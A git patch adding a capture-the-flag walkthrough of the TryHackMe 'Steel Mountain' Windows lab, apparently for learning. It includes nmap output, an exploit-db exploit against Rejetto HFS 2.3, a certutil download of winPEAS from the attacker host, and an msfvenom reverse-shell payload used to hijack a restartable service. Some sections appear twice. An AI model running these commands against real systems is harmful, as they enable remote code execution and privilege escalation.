From 7c15fbc4333f48a67cdbf6e3f0e959072cff7c2b Mon Sep 17 00:00:00 2001 From: AbdullahRizwan101 <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Tue, 27 Oct 2020 02:51:49 +0500 Subject: [PATCH] Add files via upload --- TryHackMe/steel_mountain.md | 227 ++++++++++++++++++++++++++++++++++++ 1 file changed, 227 insertions(+) create mode 100644 TryHackMe/steel_mountain.md diff --git a/TryHackMe/steel_mountain.md b/TryHackMe/steel_mountain.md new file mode 100644 index 0000000..db14b58 --- /dev/null +++ b/TryHackMe/steel_mountain.md @@ -0,0 +1,227 @@ +#TryHackMe-Steel Mountain + +## NMAP + +``` +Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-26 23:25 PKT [13/93] +Stats: 0:02:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan +NSE Timing: About 98.96% done; ETC: 23:27 (0:00:00 remaining) +Stats: 0:02:12 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan +NSE Timing: About 98.96% done; ETC: 23:27 (0:00:00 remaining) +Nmap scan report for 10.10.252.157 +Host is up (0.18s latency). +Not shown: 988 closed ports +PORT STATE SERVICE VERSION +80/tcp open http Microsoft IIS httpd 8.5 +| http-methods: +|_ Potentially risky methods: TRACE +|_http-server-header: Microsoft-IIS/8.5 +|_http-title: Site doesn't have a title (text/html). +135/tcp open msrpc Microsoft Windows RPC +139/tcp open netbios-ssn Microsoft Windows netbios-ssn +445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds +3389/tcp open ssl/ms-wbt-server? +|_ssl-date: 2020-10-26T18:26:37+00:00; 0s from scanner time. +8080/tcp open http HttpFileServer httpd 2.3 +|_http-server-header: HFS 2.3 +|_http-title: HFS / +49152/tcp open msrpc Microsoft Windows RPC +49153/tcp open msrpc Microsoft Windows RPC +49154/tcp open msrpc Microsoft Windows RPC +49155/tcp open msrpc Microsoft Windows RPC +49156/tcp open msrpc Microsoft Windows RPC +49163/tcp open msrpc Microsoft Windows RPC +Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows + +Host script results: +|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: , NetBIOS MAC: 02:84:f3:74:2b:f5 (unknown) +|_smb-os-discovery: ERROR: Script execution failed (use -d to debug) +| smb-security-mode: +| account_used: guest +| authentication_level: user +| challenge_response: supported +|_ message_signing: disabled (dangerous, but default) +| smb2-security-mode: +| 2.02: +|_ Message signing enabled but not required +| smb2-time: +| date: 2020-10-26T18:26:30 +|_ start_date: 2020-10-26T18:21:06 + +``` + +## PORT 80 + +`Who is the employee of the month?` + +Visit the web page on port 80 then look at the source of the web page and you'll image name which is the answer to the question. + + + + + +`Scan the machine with nmap. What is the other port running a web server on?` + +PORT 8080 + + +## PORT 8080 + + + + +Clicking below at the link `HttpFileServer 2.3` will redirect you to a page + + + +`Take a look at the other web server. What file server is running?` + +Rejetto Http File Server + +`What is the CVE number to exploit this file server?` + +## Searchsploit + +Now we know that it's using Rejetto Http File Server version 2.3 so let's find exploits for it + + + +Let's try using this exploit + +https://www.exploit-db.com/exploits/39161 + + + +Change the local IP and local port if you want doesn't matter if you use the default `443` port in this exploit + + + +Now host the `nc.exe` on you local machine which can be downloaded from github `https://github.com/int0x33/nc.exe/blob/master/nc.exe` or if your using kali linux then it will be available to `/usr/share/windows-resources/binaries/nc.exe` + +Hosting this file can be through python but remember to keep the port on `80` because that's the default port that http listens on + +`python3 -m http.server 80` + +Also set up a net cat listener `nc -lvp [port]` + +Run the exploit with python2 39161 8080 + + + +Run it again because the first time you ran it just downloaded it but now when you run this exploit again it will execute `nc.exe` + + + +Now upload `winPEAS.exe` on the machine for that host that file locally then download it on targeted machine + +``` +C:\Users\bill\Desktop>certutil.exe -urlcache -f http://10.14.3.143:80/winPEAS.exe winpeas.exe +certutil.exe -urlcache -f http://10.14.3.143:80/winPEAS.exe winpeas.exe +**** Online **** +CertUtil: -URLCache command completed successfully. + +C:\Users\bill\Desktop>dir +dir + Volume in drive C has no label. + Volume Serial Number is 2E4A-906A + + Directory of C:\Users\bill\Desktop + +10/26/2020 02:31 PM . +10/26/2020 02:31 PM .. +10/26/2020 01:57 PM 600,580 PowerUp.ps1 +09/27/2019 05:42 AM 70 user.txt +10/26/2020 02:31 PM 472,064 winpeas.exe + 3 File(s) 1,072,714 bytes + 2 Dir(s) 44,155,019,264 bytes free + +C:\Users\bill\Desktop> +``` +Now by simply typing .\winpeas.exe + + + +We can see that this services can be exploited so let's generate a payload named as `ASCService.exe` + +``` +msfvenom -p windows/shell_reverse_tcp LHOST=10.14.3.143 LPORT=6666 -e x86/shikata_ga_nai -f exe -o ASCService.exe +``` +Set up the netcat listener and stop that service after that upload it to the target machine and restart the service again + +### Stoppping the service + +``` + +C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9 +sc stop AdvancedSystemCareService9 + +SERVICE_NAME: AdvancedSystemCareService9 + TYPE : 110 WIN32_OWN_PROCESS (interactive) + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +``` +### Starting the service + + + + + + +## Metasploit + + + + + +No we want to escalate our root privileges so we will run `Powerup.ps1` powershell script to look for misconfigurations on targeted windows machine + + + +To enter into powershell first write `load powershell` then `powershell_shell` + + + +Run `. .\PowerUp.ps1` and `Invoke-AllChecks` + + + +Now check for service having `canRestart` set to True + + + +And name of the service is `AdvancedSystemCareService9` + +Now generate a payload with name `ASCService.exe` + +``` +msfvenom -p windows/shell_reverse_tcp LHOST=10.14.3.143 LPORT=6666 -e x86/shikata_ga_nai -f exe -o ASCService.exe +``` +Set up the netcat listener and stop that service after that upload it to the target machine and restart the service again + +### Stoppping the service + +``` + +C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9 +sc stop AdvancedSystemCareService9 + +SERVICE_NAME: AdvancedSystemCareService9 + TYPE : 110 WIN32_OWN_PROCESS (interactive) + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +``` +### Starting the service + + + +